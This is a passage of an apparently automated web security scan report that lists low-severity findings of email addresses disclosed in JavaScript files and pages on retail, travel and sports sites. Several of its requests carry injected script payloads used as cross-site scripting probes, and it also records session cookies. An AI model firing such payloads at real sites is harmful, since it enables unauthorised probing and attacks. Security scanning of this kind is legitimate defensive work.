Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMzAuMS4xLmkyOjEwMy40LjEuaTY6MTcxLjEuMDo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6MTk2LjEuMDoyLjIuMToyMDkuMC4xOjE0Ny42LjAuaTY6OTIuMC4wLmkxOjEyMS41MDMuMC5pNzoxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjEwNC4wLjE6MTk1LjAuMHxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDIhRio.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
22.26. http://www.manutd.com/styles/js/jquery.jqplugin.1.0.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /styles/js/jquery.jqplugin.1.0.2.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/js/jquery.jqplugin.1.0.2.min.js HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 11:52:36 GMT
Accept-Ranges: bytes
ETag: "01abafd3dd7cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
svr: web7
Content-Length: 1717
Cache-Control: max-age=427633
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close

/*
*jQuery browser plugin detection 1.0.2
* http://plugins.jquery.com/project/jqplugin
* Checks for plugins / mimetypes supported in the browser extending the jQuery.browser object
* Copyright (c) 2008 Leonardo Rossetti motw.leo@gmail.com
* MIT License: http://www.opensource.org/licenses/mit-license.php
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
...[SNIP]...
22.27. http://www.nike.com/nikeos/global/js/NIKEOS.global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/global/js/NIKEOS.global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nikeos/global/js/NIKEOS.global.js HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 20 Jun 2011 13:27:18 GMT
ETag: "c507-4a624b1bf9980"
Accept-Ranges: bytes
Content-Length: 50439
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 02:03:04 GMT
Date: Sun, 02 Oct 2011 23:58:30 GMT
Connection: close

var JQ = jQuery.noConflict();

// GLOBAL NIKEOS NAMESPACE
if (!window.NIKEOS) var NIKEOS = {};

/*
   SET THE SITE MODE
   10.30.08 - added localhost environment
*/
if (location.host.match(/insid
...[SNIP]...
arguments';
       else if (obj.item) return 'collection';
   }
   return typeof obj;
};

/* End MooTools Utility Functions */

/**
* To append global login new version (gigya, chinesse checkers)
* tomas.roggero@rga.com
*/
var CHINESE_CHECKERS = null, CheckersHookFile;
var host = window.location.host || window.location.hostname;
/* new code */
if( !( host.indexOf('nike-dev') === 0 || location.href.indexOf('/act
...[SNIP]...
22.28. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/global/js/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nikeos/global/js/plugins/jquery.cookie.js HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 28 May 2009 18:14:20 GMT
ETag: "1096-46afcedc11700"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 00:37:57 GMT
Date: Sun, 02 Oct 2011 23:58:30 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
22.29. http://www.orbitz.com/shared/js/exitApp.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/js/exitApp.js

Issue detail

The following email address was disclosed in the response:

Request

GET /shared/js/exitApp.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:28 GMT
ETag: "760-4adda01972100"
Content-Type: application/x-javascript
ntCoent-Length: 1888
Server: Apache
Date: Mon, 03 Oct 2011 00:37:01 GMT
Age: 3052
Connection: keep-alive
Cache-Control: private
Content-Length: 1888

//bleach@orbitz.com - 09.04.04 - Deal Detector

var runUnLoadActivity=true;
var minutes=60; //how many minutes until the window closes
var closeTime=minutes*1000*60;
var numPerDay = 100; //number of popups to see in one
...[SNIP]...
22.30. http://www.sabreairlinesolutions.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/

Issue detail

The following email address was disclosed in the response:

Request

GET /home/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618452; expires=Tue, 02-Oct-2012 00:07:32 GMT; path=/; domain=www.sabreairlinesolutions.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=www.sabreairlinesolutions.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:33 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...
22.31. http://www.sabreairlinesolutions.com/js/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.colorbox-min.js HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabreairlinesolutions.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258450; exp_last_activity=1317618450; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 09 Jul 2011 02:17:45 GMT
ETag: "e40c6f-2427-8e3c6440"
Accept-Ranges: bytes
Content-Length: 9255
Connection: close
Content-Type: application/x-javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V).f
...[SNIP]...
22.32. http://www.sabreairlinesolutions.com/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabreairlinesolutions.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258450; exp_last_activity=1317618450; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Jan 2010 23:22:08 GMT
ETag: "e40689-1096-ec314800"
Accept-Ranges: bytes
Content-Length: 4246
Connection: close
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
22.33. http://www.sabreairlinesolutions.com/js/jquery.equalHeights.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /js/jquery.equalHeights.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery.equalHeights.js HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabreairlinesolutions.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258450; exp_last_activity=1317618450; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 29 Jul 2011 15:02:16 GMT
ETag: "e40c71-12ea-912fce00"
Accept-Ranges: bytes
Content-Length: 4842
Connection: close
Content-Type: application/x-javascript

/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights" & "EqualWidths"
* by:    Scott Jehl, Todd Parker, Maggie Costello Wachs (http://www.filamentgroup
...[SNIP]...
his).children().css({'min-width': currentWidest});
   });
   return this;
};


/*--------------------------------------------------------------------
* javascript method: "pxToEm"
* by:
Scott Jehl (scott@filamentgroup.com)
Maggie Wachs (maggie@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2008 Filament Group
* Dual licensed under the MIT (filamentgroup.com/examples/mit-license.txt) and GPL (filamentgroup.com/examples/gpl-license.txt
...[SNIP]...
22.34. http://www.sabrehospitality.com/js/modal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/modal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/modal.js HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:45 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 25 Feb 2010 04:34:37 GMT
ETag: "27cc51-f27-4ce57140"
Accept-Ranges: bytes
Content-Length: 3879
Connection: close
Content-Type: application/x-javascript

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqmodal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...
22.35. http://www.sabrehospitality.com/js/roundies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/roundies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/roundies.js HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Jan 2009 03:19:06 GMT
ETag: "27cbd7-20ed-6751be80"
Accept-Ranges: bytes
Content-Length: 8429
Connection: close
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Us
...[SNIP]...
22.36. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621490; expires=Tue, 02-Oct-2012 00:58:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...
22.37. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621580; expires=Tue, 02-Oct-2012 00:59:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
